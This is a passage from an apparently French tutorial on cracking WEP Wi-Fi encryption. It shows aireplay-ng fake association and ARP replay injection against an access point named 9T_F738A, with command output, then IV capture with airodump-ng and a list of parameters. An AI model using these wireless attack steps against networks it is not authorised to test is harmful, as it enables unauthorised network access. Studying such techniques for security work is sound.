• On se réassocie à l’ap:

      root@bigbrother:~# aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX -e 9T_F738A -h XX:XX:XX:XX:XX:XX ath0
      The interface MAC (00:17:9A:B1:66:60) doesn't match the specified MAC (-h).
      ifconfig ath0 hw ether XX:XX:XX:XX:XX:XX
                                                                                          
      20:45:52  Sending Authentication Request
      20:45:52  Authentication successful
      20:45:52  Sending Association Request
      20:45:54  Association successful :-)

• Et on envoie des packets:

      root@bigbrother:~# aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -e 9T_F738A -h XX:XX:XX:XX:XX:XX -r replay_src-la_date.cap ath0
      The interface MAC (00:17:9A:B1:66:60) doesn't match the specified MAC (-h).
      ifconfig ath0 hw ether 00:16:CF:61:C2:22
                                                                                          
      Saving ARP requests in replay_arp-0206-204559.cap
      You should also start airodump-ng to capture replies.
      Read 24966 packets (got 3281 ARP requests), sent 11523 packets...

On voit que cela fonctionne, on n’est pas désassocié de l’ap et on récupere plein de requetes ARP tout en envoyant plein de packets. On peut dumper les IVs :

      root@bigbrother:~# airodump-ng --ivs --channel 11 ath0 -w dump

Explication des paramètres :

1. –ivs : pour dumper que les IVs
2. –channel : le channel dans lequel se trouve l’ap
3. ath0 : notre interface réseau
4. -w : le nom du fichier de sortie